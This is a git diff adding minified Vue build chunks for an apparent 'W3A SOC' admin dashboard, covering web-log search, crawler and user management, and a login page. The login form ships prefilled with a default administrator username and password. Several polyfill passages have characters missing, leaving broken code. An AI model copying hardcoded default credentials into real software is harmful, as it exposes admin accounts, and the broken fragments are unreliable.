t={page:this.listQuery.page,pageSize:this.listQuery.limit};Object(s["f"])(t).then((function(t){e.listLoading=!1,1===t.status?(e.listDataObject.outSideListData=t.data.list,e.listQuery.page=t.data.page,e.listQuery.limit=t.data.pageSize,e.listQuery.total=t.data.total):e.$message.error(t.msg)}))}}},l=o,u=(a("e450f"),a("2a38"),a("2877")),c=Object(u["a"])(l,n,r,!1,null,"6ab2272c",null);t["default"]=c.exports},8312:function(e,t,a){},a52a:function(e,t,a){},a9e3:function(e,t,a){"use strict";var n=a("83ab"),r=a("da84"),i=a("94ca"),s=a("6eeb"),o=a("5135"),l=a("c6b6"),u=a("7156"),c=a("c04e"),d=a("d039"),p=a("7c73"),f=a("241c").f,g=a("06cf").f,m=a("9bf2").f,h=a("58a8").trim,b="Number",v=r[b],w=v.prototype,y=l(p(w))==b,C=function(e){var t,a,n,r,i,s,o,l,u=c(e,!1);if("string"==typeof u&&u.length>2)if(u=h(u),t=u.charCodeAt(0),43===t||45===t){if(a=u.charCodeAt(2),88===a||120===a)return NaN}else if(48===t){switch(u.charCodeAt(1)){case 66:case 98:n=2,r=49;break;case 79:case 111:n=8,r=55;break;default:return+u}for(i=u.slice(2),s=i.length,o=0;or)return NaN;return parseInt(i,n)}return+u};if(i(b,!v(" 0o1")||!v("0b1")||v("+0x1"))){for(var S,_=function(e){var t=arguments.length<1?0:e,a=this;return a instanceof _&&(y?d((function(){w.valueOf.call(a)})):l(a)!=b)?u(new v(C(t)),a,_):C(t)},z=n?f(v):"MAX_VALUE,MIN_VALUE,NaN,NEGATIVE_INFINITY,POSITIVE_INFINITY,EPSILON,isFinite,isInteger,isNaN,isSafeInteger,MAX_SAFE_INTEGER,MIN_SAFE_INTEGER,parseFloat,parseInt,isInteger".split(","),I=0;z.length>I;I++)o(v,S=z[I])&&!o(_,S)&&m(_,S,g(v,S));_.prototype=w,w.constructor=_,s(r,b,_)}},b775:function(e,t,a){"use strict";a("d3b7");var n=a("bc3a"),r=a.n(n),i=a("5c96"),s=r.a.create({baseURL:"/prod-api",timeout:5e3});s.interceptors.request.use((function(e){return e.headers["token"]=localStorage.getItem("token"),e.headers["website"]=localStorage.getItem("websiteDomain"),e.headers["roles"]=localStorage.getItem("roles"),e}),(function(e){return Promise.reject(e)})),s.interceptors.response.use((function(e){var t=e.data;return t}),(function(e){return Object(i["Notification"])({message:e.message,title:"错误",type:"error"}),Promise.reject(e)})),t["a"]=s},c2f1:function(e,t,a){"use strict";a.d(t,"b",(function(){return s})),a.d(t,"a",(function(){return o})),a.d(t,"f",(function(){return l})),a.d(t,"c",(function(){return u})),a.d(t,"d",(function(){return c})),a.d(t,"e",(function(){return d})),a.d(t,"g",(function(){return p}));var n=a("b775"),r=a("4328"),i=a.n(r);function s(e){return n["a"].post("/assets/lists",i.a.stringify(e))}function o(e){return n["a"].post("/assets/delete",i.a.stringify(e))}function l(e){return n["a"].post("/spiders/lists",i.a.stringify(e))}function u(e){return n["a"].post("/spiders/add",i.a.stringify(e))}function c(e){return n["a"].post("/spiders/changeStatus",i.a.stringify(e))}function d(e){return n["a"].post("/spiders/delete",i.a.stringify(e))}function p(e){return n["a"].post("/spiders/spiderTypes",i.a.stringify(e))}},e450f:function(e,t,a){"use strict";a("a52a")},f1df:function(e,t,a){"use strict";a("8312")}}]); \ No newline at end of file diff --git a/frontend/dist/static/js/chunk-66836180.0a67c1e6.js b/frontend/dist/static/js/chunk-66836180.0a67c1e6.js new file mode 100644 index 0000000..413090b --- /dev/null +++ b/frontend/dist/static/js/chunk-66836180.0a67c1e6.js @@ -0,0 +1 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-66836180"],{"333d":function(e,t,a){"use strict";var n=function(){var e=this,t=e.$createElement,a=e._self._c||t;return a("div",{staticClass:"pagination-container",class:{hidden:e.hidden}},[a("el-pagination",e._b({attrs:{background:e.background,"current-page":e.currentPage,"page-size":e.pageSize,layout:e.layout,"page-sizes":e.pageSizes,total:e.total},on:{"update:currentPage":function(t){e.currentPage=t},"update:current-page":function(t){e.currentPage=t},"update:pageSize":function(t){e.pageSize=t},"update:page-size":function(t){e.pageSize=t},"size-change":e.handleSizeChange,"current-change":e.handleCurrentChange}},"el-pagination",e.$attrs,!1))],1)},i=[];a("a9e3");Math.easeInOutQuad=function(e,t,a,n){return e/=n/2,e<1?a/2*e*e+t:(e--,-a/2*(e*(e-2)-1)+t)};var r=function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||function(e){window.setTimeout(e,1e3/60)}}();function o(e){document.documentElement.scrollTop=e,document.body.parentNode.scrollTop=e,document.body.scrollTop=e}function s(){return document.documentElement.scrollTop||document.body.parentNode.scrollTop||document.body.scrollTop}function l(e,t,a){var n=s(),i=e-n,l=20,c=0;t="undefined"===typeof t?500:t;var u=function e(){c+=l;var s=Math.easeInOutQuad(c,n,i,t);o(s),c2)if(c=m(c),t=c.charCodeAt(0),43===t||45===t){if(a=c.charCodeAt(2),88===a||120===a)return NaN}else if(48===t){switch(c.charCodeAt(1)){case 66:case 98:n=2,i=49;break;case 79:case 111:n=8,i=55;break;default:return+c}for(r=c.slice(2),o=r.length,s=0;si)return NaN;return parseInt(r,n)}return+c};if(r(v,!b(" 0o1")||!b("0b1")||b("+0x1"))){for(var T,E=function(e){var t=arguments.length<1?0:e,a=this;return a instanceof E&&(w?d((function(){S.valueOf.call(a)})):l(a)!=v)?c(new b(y(t)),a,E):y(t)},C=n?g(b):"MAX_VALUE,MIN_VALUE,NaN,NEGATIVE_INFINITY,POSITIVE_INFINITY,EPSILON,isFinite,isInteger,isNaN,isSafeInteger,MAX_SAFE_INTEGER,MIN_SAFE_INTEGER,parseFloat,parseInt,isInteger".split(","),N=0;C.length>N;N++)s(b,T=C[N])&&!s(E,T)&&h(E,T,f(b,T));E.prototype=S,S.constructor=E,o(i,v,E)}},b51b:function(e,t,a){"use strict";a("cf18")},b775:function(e,t,a){"use strict";a("d3b7");var n=a("bc3a"),i=a.n(n),r=a("5c96"),o=i.a.create({baseURL:"/prod-api",timeout:5e3});o.interceptors.request.use((function(e){return e.headers["token"]=localStorage.getItem("token"),e.headers["website"]=localStorage.getItem("websiteDomain"),e.headers["roles"]=localStorage.getItem("roles"),e}),(function(e){return Promise.reject(e)})),o.interceptors.response.use((function(e){var t=e.data;return t}),(function(e){return Object(r["Notification"])({message:e.message,title:"错误",type:"error"}),Promise.reject(e)})),t["a"]=o},bcda:function(e,t,a){"use strict";a.r(t);var n=function(){var e=this,t=e.$createElement,a=e._self._c||t;return a("div",{staticClass:"dashboard-container"},[a("div",{staticClass:"dashboard-text"},[a("el-form",{staticStyle:{"margin-top":"-15px"},attrs:{inline:!0,size:"small",model:e.searchService,"hide-required-asterisk":""}},[a("el-form-item",[a("el-input",{attrs:{placeholder:"请输入访问源IP"},model:{value:e.searchService.interviewer,callback:function(t){e.$set(e.searchService,"interviewer",t)},expression:"searchService.interviewer"}})],1),a("el-form-item",[a("el-select",{attrs:{size:"small",placeholder:"请选择请求方法"},on:{change:e.handleChange},model:{value:e.searchService.requestType,callback:function(t){e.$set(e.searchService,"requestType",t)},expression:"searchService.requestType"}},[a("el-option",{attrs:{label:"GET",value:"GET"}}),a("el-option",{attrs:{label:"POST",value:"POST"}}),a("el-option",{attrs:{label:"PUT",value:"PUT"}}),a("el-option",{attrs:{label:"DELETE",value:"DELETE"}}),a("el-option",{attrs:{label:"HEAD",value:"HEAD"}}),a("el-option",{attrs:{label:"OPTIONS",value:"OPTIONS"}}),a("el-option",{attrs:{label:"TRACE",value:"TRACE"}}),a("el-option",{attrs:{label:"CONNECT",value:"CONNECT"}}),a("el-option",{attrs:{label:"PATCH",value:"PATCH"}})],1)],1),a("el-form-item",[a("el-input",{attrs:{placeholder:"响应码"},model:{value:e.searchService.statusCode,callback:function(t){e.$set(e.searchService,"statusCode",t)},expression:"searchService.statusCode"}})],1),a("el-form-item",[a("el-button",{attrs:{type:"primary",icon:"el-icon-search"},on:{click:e.searchwebLogBtn}},[e._v("检索")])],1)],1),a("el-table",{directives:[{name:"loading",rawName:"v-loading",value:e.listLoading,expression:"listLoading"}],key:e.searchService.region,staticClass:"headers",attrs:{size:"small","header-cell-style":{hegiht:"10000px"},data:e.weblogLists,"element-loading-text":"加载中...",border:""},on:{"sort-change":e.handleSort}},[a("el-table-column",{attrs:{label:"请求类型",align:"center",width:"100%",formatter:e.stateFormat},scopedSlots:e._u([{key:"default",fn:function(t){return[a("span",[a("el-tag",{attrs:{type:"warning"}},[e._v(e._s(t.row.method))])],1)]}}])}),a("el-table-column",{attrs:{label:"访问时间",width:"200%",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[a("span",[e._v(e._s(t.row.createTime))])]}}])}),a("el-table-column",{attrs:{label:"来源IP",width:"110%",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[a("span",[e._v(e._s(t.row.remoteAddr))])]}}])}),a("el-table-column",{attrs:{label:"响应码",width:"110%",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[a("span",[e._v(e._s(t.row.statusCode))])]}}])}),a("el-table-column",{attrs:{label:"请求路径",align:"left"},scopedSlots:e._u([{key:"default",fn:function(t){return[a("span",[e._v(e._s(t.row.request))])]}}])}),a("el-table-column",{attrs:{label:"请求内容",align:"left"},scopedSlots:e._u([{key:"default",fn:function(t){return[a("span",[e._v(e._s(t.row.requestBody))])]}}])}),a("el-table-column",{attrs:{label:"请求内容",align:"left"},scopedSlots:e._u([{key:"default",fn:function(t){return[a("span",[e._v(e._s(t.row.userAgent))])]}}])})],1),a("el-row",[a("div",{staticClass:"row"},[a("pagination",{directives:[{name:"show",rawName:"v-show",value:e.total>0,expression:"total > 0"}],staticStyle:{"margin-left":"-20px","margin-top":"-10px"},attrs:{total:e.total,page:e.listQuery.page,limit:e.listQuery.limit},on:{"update:page":function(t){return e.$set(e.listQuery,"page",t)},"update:limit":function(t){return e.$set(e.listQuery,"limit",t)},pagination:e.getweblogLists}})],1)])],1)])},i=[],r=a("333d"),o=a("b775"),s=a("4328"),l=a.n(s);function c(e){return o["a"].post("/weblog/lists",l.a.stringify(e))}var u={name:"",components:{Pagination:r["a"]},props:{},data:function(){return{devote:"devote desc",messagePop:!1,direction:"rtl",listLoading:!1,orderServiceBasePageInfo:{currentPage:1,pageSize:10,total:0},searchService:{interviewer:"",business:""},agency:{value:"",options:[]},weblogLists:[],weblogPage:{currentPage:1,pageSize:10,total:0},total:0,listQuery:{importance:void 0,title:void 0,type:void 0,page:1,limit:10}}},computed:{},watch:{},created:function(){},mounted:function(){this.getweblogLists()},methods:{stateFormat:function(e,t){return 0==e.attackMethod?"GET":1==e.attackMethod?"POST":2==e.attackMethod?"PUT":3==e.attackMethod?"DELETE":4==e.attackMethod?"HEAD":5==e.attackMethod?"OPTIONS":6==e.attackMethod?"TRACE":7==e.attackMethod?"CONNECT":8==e.attackMethod?"PATCH":void 0},handleChange:function(e){this.behaviourPage.currentPage=1,this.getweblogLists()},returnBtn:function(){this.messagePop=!1},lookBtn:function(){this.messagePop=!0},handleSort:function(e){"ascending"==e.order?this.doctorData.devote="devote desc":"descending"==e.order&&(this.doctorData.devote="devote asc"),this.getweblogLists()},getweblogLists:function(){var e=this,t={page:this.listQuery.page,pageSize:this.listQuery.limit};""!=this.searchService.interviewer&&(t["remoteAddr"]=this.searchService.interviewer),void 0!=this.searchService.requestType&&(t["method"]=this.searchService.requestType),""!=this.searchService.statusCode&&(t["statusCode"]=this.searchService.statusCode),this.listLoading=!0,c(t).then((function(t){e.listLoading=!1,1===t.status?(e.weblogLists=t.data.list,e.listQuery.page=t.data.page,e.listQuery.limit=t.data.pageSize,e.total=t.data.total):e.$message.error(t.msg)}))},searchwebLogBtn:function(){this.listQuery.page=1,this.getweblogLists()}}},d=u,p=(a("66d5"),a("7a91"),a("b51b"),a("2877")),g=Object(p["a"])(d,n,i,!1,null,"0366d15a",null);t["default"]=g.exports},cf18:function(e,t,a){},f1df:function(e,t,a){"use strict";a("8312")}}]); \ No newline at end of file diff --git a/frontend/dist/static/js/chunk-766e5a01.339361bb.js b/frontend/dist/static/js/chunk-766e5a01.339361bb.js new file mode 100644 index 0000000..2e9f400 --- /dev/null +++ b/frontend/dist/static/js/chunk-766e5a01.339361bb.js @@ -0,0 +1 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-766e5a01"],{2017:function(e,t,r){"use strict";r("cafe8")},"2c6f":function(e,t,r){},"9ed6":function(e,t,r){"use strict";r.r(t);var s=function(){var e=this,t=e.$createElement,r=e._self._c||t;return r("div",{staticClass:"login-container"},[r("el-form",{ref:"loginForm",staticClass:"login-form",attrs:{model:e.loginForm,rules:e.loginRules,"auto-complete":"on","label-position":"left"}},[r("div",{staticClass:"title-container"},[r("h3",{staticClass:"title"},[e._v("W3A SOC")])]),r("el-form-item",{attrs:{prop:"username"}},[r("span",{staticClass:"svg-container"},[r("svg-icon",{attrs:{"icon-class":"user"}})],1),r("el-input",{ref:"username",attrs:{placeholder:"",name:"userName",type:"text",tabindex:"1","auto-complete":"on"},model:{value:e.loginForm.userName,callback:function(t){e.$set(e.loginForm,"userName",t)},expression:"loginForm.userName"}})],1),r("el-form-item",{attrs:{prop:"password"}},[r("span",{staticClass:"svg-container"},[r("svg-icon",{attrs:{"icon-class":"password"}})],1),r("el-input",{key:e.passwordType,ref:"password",attrs:{type:e.passwordType,placeholder:"",name:"userPassWord",tabindex:"2","auto-complete":"on"},nativeOn:{keyup:function(t){return!t.type.indexOf("key")&&e._k(t.keyCode,"enter",13,t.key,"Enter")?null:e.handleLogin(t)}},model:{value:e.loginForm.userPassWord,callback:function(t){e.$set(e.loginForm,"userPassWord",t)},expression:"loginForm.userPassWord"}}),r("span",{staticClass:"show-pwd",on:{click:e.showPwd}},[r("svg-icon",{attrs:{"icon-class":"password"===e.passwordType?"eye":"eye-open"}})],1)],1),r("el-row",{attrs:{gutter:10}},[r("el-col",{attrs:{xs:24,sm:24,md:24,lg:24,xl:24}},[r("el-button",{staticStyle:{width:"100%","margin-bottom":"30px"},attrs:{loading:e.loading,type:"primary"},nativeOn:{click:function(t){return t.preventDefault(),e.handleLogin(t)}}},[e._v("登陆工作台")])],1)],1)],1)],1)},o=[],n=r("b775"),a=r("4328"),i=r.n(a);function l(e){return n["a"].post("/login/in",i.a.stringify(e))}var c={name:"Login",data:function(){var e=function(e,t,r){t.length<1?r(new Error("请输入用户名!")):r()},t=function(e,t,r){t.length<1?r(new Error("请输入密码!")):r()};return{loginForm:{userName:"admin",userPassWord:"w3admin"},loginRules:{userName:[{required:!0,trigger:"blur",validator:e}],userPassWord:[{required:!0,trigger:"blur",validator:t}]},loading:!1,passwordType:"password",redirect:void 0}},watch:{$route:{handler:function(e){this.redirect=e.query&&e.query.redirect},immediate:!0}},methods:{showPwd:function(){var e=this;"password"===this.passwordType?this.passwordType="":this.passwordType="password",this.$nextTick((function(){e.$refs.password.focus()}))},handleLogin:function(){var e=this;this.$refs.loginForm.validate((function(t){if(!t)return!1;e.loading=!0,l(e.loginForm).then((function(t){e.loading=!1,1===t.status?(localStorage.setItem("token",t.data),e.$router.push({path:"/tab"})):(e.$notify.error("登陆失败,账号或者密码错误!"),e.loading=!1)}))}))}}},u=c,d=(r("2017"),r("dc11"),r("2877")),p=Object(d["a"])(u,s,o,!1,null,"0b594fea",null);t["default"]=p.exports},b775:function(e,t,r){"use strict";r("d3b7");var s=r("bc3a"),o=r.n(s),n=r("5c96"),a=o.a.create({baseURL:"/prod-api",timeout:5e3});a.interceptors.request.use((function(e){return e.headers["token"]=localStorage.getItem("token"),e.headers["website"]=localStorage.getItem("websiteDomain"),e.headers["roles"]=localStorage.getItem("roles"),e}),(function(e){return Promise.reject(e)})),a.interceptors.response.use((function(e){var t=e.data;return t}),(function(e){return Object(n["Notification"])({message:e.message,title:"错误",type:"error"}),Promise.reject(e)})),t["a"]=a},cafe8:function(e,t,r){},dc11:function(e,t,r){"use strict";r("2c6f")}}]); \ No newline at end of file diff --git a/frontend/dist/static/js/chunk-7a763d7c.d8cf6fc6.js b/frontend/dist/static/js/chunk-7a763d7c.d8cf6fc6.js new file mode 100644 index 0000000..cb1a4b5 --- /dev/null +++ b/frontend/dist/static/js/chunk-7a763d7c.d8cf6fc6.js @@ -0,0 +1 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-7a763d7c"],{"0da88":function(t,e,a){"use strict";a("857c")},"199c":function(t,e,a){"use strict";a.r(e);var n=function(){var t=this,e=t.$createElement,a=t._self._c||e;return a("div",{staticClass:"dashboard-container"},[a("el-form",{staticStyle:{"margin-top":"-15px"},attrs:{inline:!0,size:"mini","hide-required-asterisk":""}},[a("el-form-item",[a("el-button",{attrs:{type:"primary",icon:"el-icon-plus",size:"small"},on:{click:function(e){return t.newUserBtn()}}},[t._v(" 新建用户")])],1)],1),a("el-table",{directives:[{name:"loading",rawName:"v-loading",value:t.listLoading,expression:"listLoading"}],staticClass:"headers",staticStyle:{width:"auto"},attrs:{data:t.userDataLists,"element-loading-text":"加载中...",border:""}},[a("el-table-column",{attrs:{align:"center",label:"用户ID"},scopedSlots:t._u([{key:"default",fn:function(e){return[t._v(t._s(e.row.userId))]}}])}),a("el-table-column",{attrs:{label:"登录账号",align:"center"},scopedSlots:t._u([{key:"default",fn:function(e){return[t._v(" "+t._s(e.row.userName)+" ")]}}])}),a("el-table-column",{attrs:{label:"注册时间",align:"center"},scopedSlots:t._u([{key:"default",fn:function(e){return[t._v(" "+t._s(e.row.userCreateTime)+" ")]}}])}),a("el-table-column",{attrs:{label:"最近登录时间",align:"center"},scopedSlots:t._u([{key:"default",fn:function(e){return[t._v(" "+t._s(e.row.userUpdateTime?e.row.userUpdateTime:"未登录")+" ")]}}])}),a("el-table-column",{attrs:{label:"状态",align:"center"},scopedSlots:t._u([{key:"default",fn:function(e){return[a("el-switch",{attrs:{value:1==e.row.userStatus,"active-color":"#13ce66","inactive-color":"#ff4949"},on:{change:function(a){return t.StatusChange(e.row)}}})]}}])}),a("el-table-column",{attrs:{label:"操作",align:"center"},scopedSlots:t._u([{key:"default",fn:function(e){return[a("div",{staticClass:"grid-content bg-purple-light"},[a("el-button",{staticClass:"ml0 mt5",attrs:{size:"mini"},on:{click:function(a){return t.changePwBtn(e.row)}}},[t._v("修改密码")])],1)]}}])})],1),a("div",{staticClass:"row"},[a("pagination",{directives:[{name:"show",rawName:"v-show",value:t.total>10,expression:"total > 10"}],staticStyle:{"margin-left":"-20px","margin-top":"-10px"},attrs:{total:t.total,page:t.listQuery.page,limit:t.listQuery.limit},on:{"update:page":function(e){return t.$set(t.listQuery,"page",e)},"update:limit":function(e){return t.$set(t.listQuery,"limit",e)},pagination:t.getUserList}})],1),a("el-dialog",{attrs:{title:"修改密码",visible:t.editPsaawardPop,width:"25%"},on:{"update:visible":function(e){t.editPsaawardPop=e}}},[a("el-form",{ref:"userData",attrs:{model:t.userData,"label-width":"130px"}},[a("el-form-item",{attrs:{label:"请输入新密码 :"}},[a("el-input",{staticClass:"ipt",attrs:{placeholder:"请输入新密码"},model:{value:t.userData.newpassward,callback:function(e){t.$set(t.userData,"newpassward",e)},expression:"userData.newpassward"}})],1)],1),a("span",{staticClass:"dialog-footer",attrs:{slot:"footer"},slot:"footer"},[a("el-button",{on:{click:function(e){t.editPsaawardPop=!1}}},[t._v("取 消")]),a("el-button",{attrs:{type:"primary"},on:{click:function(e){return t.confirmBtn()}}},[t._v("确定修改")])],1)],1),a("el-drawer",{attrs:{visible:t.messagePop,direction:t.direction,size:"25%",title:"新建用户"},on:{"update:visible":function(e){t.messagePop=e}}},[a("div",{staticClass:"demo-drawer__content"},[a("el-form",{ref:"numberData",staticStyle:{"margin-left":"20px"},attrs:{model:t.numberData,"label-width":"80px"}},[a("el-form-item",{attrs:{label:"用户账号 :"}},[a("el-input",{staticClass:"ipt",attrs:{placeholder:"请输入用户账号"},model:{value:t.numberData.account,callback:function(e){t.$set(t.numberData,"account",e)},expression:"numberData.account"}})],1),a("el-form-item",{attrs:{label:"用户密码 :"}},[a("el-input",{staticClass:"ipt",attrs:{placeholder:"请输入用户密码"},model:{value:t.numberData.password,callback:function(e){t.$set(t.numberData,"password",e)},expression:"numberData.password"}})],1)],1),a("div",{staticClass:"demo-drawer__footer"},[a("el-button",{attrs:{size:"small"},on:{click:function(e){return t.returnBtn()}}},[t._v(" 返回")]),a("el-button",{attrs:{type:"primary",size:"small"},on:{click:function(e){return t.confirmEditBtn()}}},[t._v(" 确认创建")])],1)],1)]),a("el-dialog",{attrs:{title:"提示",visible:t.editUserPop,width:"25%"},on:{"update:visible":function(e){t.editUserPop=e}}},[a("span",[t._v("是否确认修改用户状态?")]),a("span",{staticClass:"dialog-footer",attrs:{slot:"footer"},slot:"footer"},[a("el-button",{on:{click:function(e){t.editUserPop=!1}}},[t._v("取 消")]),a("el-button",{attrs:{type:"primary"},on:{click:function(e){return t.editSureBtn()}}},[t._v("确 定")])],1)])],1)},s=[],i=a("333d"),r=a("b775"),o=a("4328"),u=a.n(o);function l(t){return r["a"].post("/users/lists",u.a.stringify(t))}function c(t){return r["a"].post("/users/add",u.a.stringify(t))}function d(t){return r["a"].post("/users/changePassword",u.a.stringify(t))}function p(t){return r["a"].post("/users/changeStatus",u.a.stringify(t))}var f={name:"",components:{Pagination:i["a"]},props:{},data:function(){return{editUserPop:!1,userData:{userid:"",Identification:"",newpassward:""},editPsaawardPop:!1,numberData:{account:"",password:""},direction:"rtl",messagePop:!1,editFlag:!0,listLoading:!1,userDataLists:[],userDataListsPage:{currentPage:1,pageSize:10,total:0},total:0,listQuery:{importance:void 0,title:void 0,type:void 0,page:1,limit:10}}},computed:{},watch:{},created:function(){},mounted:function(){this.getUserList()},methods:{editSureBtn:function(){var t=this;p({userId:this.userId}).then((function(e){t.listLoading=!1,1===e.status?(t.$message.success(e.msg),t.editUserPop=!1,t.getUserList()):(t.$message.error(e.msg),t.getUserList())}))},StatusChange:function(t){this.userId=t.userId,this.editUserPop=!0},changePasswordBtn:function(){this.editFlag=!1,this.userData.newpassward=""},confirmBtn:function(){var t=this;this.editFlag=!0,d({userName:this.userData.Identification,userPassWord:this.userData.newpassward}).then((function(e){t.listLoading=!1,1===e.status?(t.$message.success(e.msg),t.editPsaawardPop=!1,t.userData.newpassward="",t.getUserList()):(t.$message.error(e.msg),t.userData.newpassward="",t.editPsaawardPop=!1)}))},changePwBtn:function(t){this.editPsaawardPop=!0,this.editFlag=!0,this.userData.userid=t.userId,this.userData.Identification=t.userName},returnpwdBtn:function(){this.editPsaawardPop=!1},newUserBtn:function(){this.numberData.account="",this.numberData.password="",this.messagePop=!0},returnBtn:function(){this.messagePop=!1},confirmEditBtn:function(){var t=this;this.numberData.account?this.numberData.password?c({userName:this.numberData.account,userPassWord:this.numberData.password}).then((function(e){t.listLoading=!1,1===e.status?(t.$message.success(e.msg),t.messagePop=!1,t.getUserList()):(t.$message.error(e.msg),t.messagePop=!1)})):this.$message.error("请输入用户密码"):this.$message.error("请输入用户账号")},getUserList:function(){var t=this;this.listLoading=!0,l({page:this.listQuery.page,pageSize:this.listQuery.limit}).then((function(e){t.listLoading=!1,1===e.status?(t.userDataLists=e.data.list,t.listQuery.page=e.data.page,t.listQuery.limit=e.data.pageSize,t.total=e.data.total):t.$message.error(e.msg)}))}}},m=f,g=(a("0da88"),a("2877")),h=Object(g["a"])(m,n,s,!1,null,"63366fdc",null);e["default"]=h.exports},"333d":function(t,e,a){"use strict";var n=function(){var t=this,e=t.$createElement,a=t._self._c||e;return a("div",{staticClass:"pagination-container",class:{hidden:t.hidden}},[a("el-pagination",t._b({attrs:{background:t.background,"current-page":t.currentPage,"page-size":t.pageSize,layout:t.layout,"page-sizes":t.pageSizes,total:t.total},on:{"update:currentPage":function(e){t.currentPage=e},"update:current-page":function(e){t.currentPage=e},"update:pageSize":function(e){t.pageSize=e},"update:page-size":function(e){t.pageSize=e},"size-change":t.handleSizeChange,"current-change":t.handleCurrentChange}},"el-pagination",t.$attrs,!1))],1)},s=[];a("a9e3");Math.easeInOutQuad=function(t,e,a,n){return t/=n/2,t<1?a/2*t*t+e:(t--,-a/2*(t*(t-2)-1)+e)};var i=function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||function(t){window.setTimeout(t,1e3/60)}}();function r(t){document.documentElement.scrollTop=t,document.body.parentNode.scrollTop=t,document.body.scrollTop=t}function o(){return document.documentElement.scrollTop||document.body.parentNode.scrollTop||document.body.scrollTop}function u(t,e,a){var n=o(),s=t-n,u=20,l=0;e="undefined"===typeof e?500:e;var c=function t(){l+=u;var o=Math.easeInOutQuad(l,n,s,e);r(o),l2)if(l=h(l),e=l.charCodeAt(0),43===e||45===e){if(a=l.charCodeAt(2),88===a||120===a)return NaN}else if(48===e){switch(l.charCodeAt(1)){case 66:case 98:n=2,s=49;break;case 79:case 111:n=8,s=55;break;default:return+l}for(i=l.slice(2),r=i.length,o=0;os)return NaN;return parseInt(i,n)}return+l};if(i(b,!w(" 0o1")||!w("0b1")||w("+0x1"))){for(var S,_=function(t){var e=arguments.length<1?0:t,a=this;return a instanceof _&&(y?d((function(){v.valueOf.call(a)})):u(a)!=b)?l(new w(P(e)),a,_):P(e)},D=n?f(w):"MAX_VALUE,MIN_VALUE,NaN,NEGATIVE_INFINITY,POSITIVE_INFINITY,EPSILON,isFinite,isInteger,isNaN,isSafeInteger,MAX_SAFE_INTEGER,MIN_SAFE_INTEGER,parseFloat,parseInt,isInteger".split(","),I=0;D.length>I;I++)o(w,S=D[I])&&!o(_,S)&&g(_,S,m(w,S));_.prototype=v,v.constructor=_,r(s,b,_)}},b775:function(t,e,a){"use strict";a("d3b7");var n=a("bc3a"),s=a.n(n),i=a("5c96"),r=s.a.create({baseURL:"/prod-api",timeout:5e3});r.interceptors.request.use((function(t){return t.headers["token"]=localStorage.getItem("token"),t.headers["website"]=localStorage.getItem("websiteDomain"),t.headers["roles"]=localStorage.getItem("roles"),t}),(function(t){return Promise.reject(t)})),r.interceptors.response.use((function(t){var e=t.data;return e}),(function(t){return Object(i["Notification"])({message:t.message,title:"错误",type:"error"}),Promise.reject(t)})),e["a"]=r},f1df:function(t,e,a){"use strict";a("8312")}}]); \ No newline at end of file diff --git a/frontend/dist/static/js/chunk-7ee29dac.422a38c7.js b/frontend/dist/static/js/chunk-7ee29dac.422a38c7.js new file mode 100644 index 0000000..9348f58 --- /dev/null +++ b/frontend/dist/static/js/chunk-7ee29dac.422a38c7.js @@ -0,0 +1 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-7ee29dac"],{"333d":function(e,t,a){"use strict";var n=function(){var e=this,t=e.$createElement,a=e._self._c||t;return a("div",{staticClass:"pagination-container",class:{hidden:e.hidden}},[a("el-pagination",e._b({attrs:{background:e.background,"current-page":e.currentPage,"page-size":e.pageSize,layout:e.layout,"page-sizes":e.pageSizes,total:e.total},on:{"update:currentPage":function(t){e.currentPage=t},"update:current-page":function(t){e.currentPage=t},"update:pageSize":function(t){e.pageSize=t},"update:page-size":function(t){e.pageSize=t},"size-change":e.handleSizeChange,"current-change":e.handleCurrentChange}},"el-pagination",e.$attrs,!1))],1)},r=[];a("a9e3");Math.easeInOutQuad=function(e,t,a,n){return e/=n/2,e<1?a/2*e*e+t:(e--,-a/2*(e*(e-2)-1)+t)};var i=function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||function(e){window.setTimeout(e,1e3/60)}}();function s(e){document.documentElement.scrollTop=e,document.body.parentNode.scrollTop=e,document.body.scrollTop=e}function o(){return document.documentElement.scrollTop||document.body.parentNode.scrollTop||document.body.scrollTop}function c(e,t,a){var n=o(),r=e-n,c=20,l=0;t="undefined"===typeof t?500:t;var u=function e(){l+=c;var o=Math.easeInOutQuad(l,n,r,t);s(o),l2)if(l=_(l),t=l.charCodeAt(0),43===t||45===t){if(a=l.charCodeAt(2),88===a||120===a)return NaN}else if(48===t){switch(l.charCodeAt(1)){case 66:case 98:n=2,r=49;break;case 79:case 111:n=8,r=55;break;default:return+l}for(i=l.slice(2),s=i.length,o=0;or)return NaN;return parseInt(i,n)}return+l};if(i(b,!h(" 0o1")||!h("0b1")||h("+0x1"))){for(var y,I=function(e){var t=arguments.length<1?0:e,a=this;return a instanceof I&&(w?d((function(){S.valueOf.call(a)})):c(a)!=b)?l(new h(v(t)),a,I):v(t)},C=n?f(h):"MAX_VALUE,MIN_VALUE,NaN,NEGATIVE_INFINITY,POSITIVE_INFINITY,EPSILON,isFinite,isInteger,isNaN,isSafeInteger,MAX_SAFE_INTEGER,MIN_SAFE_INTEGER,parseFloat,parseInt,isInteger".split(","),x=0;C.length>x;x++)o(h,y=C[x])&&!o(I,y)&&g(I,y,m(h,y));I.prototype=S,S.constructor=I,s(r,b,I)}},ae63:function(e,t,a){},b775:function(e,t,a){"use strict";a("d3b7");var n=a("bc3a"),r=a.n(n),i=a("5c96"),s=r.a.create({baseURL:"/prod-api",timeout:5e3});s.interceptors.request.use((function(e){return e.headers["token"]=localStorage.getItem("token"),e.headers["website"]=localStorage.getItem("websiteDomain"),e.headers["roles"]=localStorage.getItem("roles"),e}),(function(e){return Promise.reject(e)})),s.interceptors.response.use((function(e){var t=e.data;return t}),(function(e){return Object(i["Notification"])({message:e.message,title:"错误",type:"error"}),Promise.reject(e)})),t["a"]=s},b9b3:function(e,t,a){"use strict";a.r(t);var n=function(){var e=this,t=e.$createElement,a=e._self._c||t;return 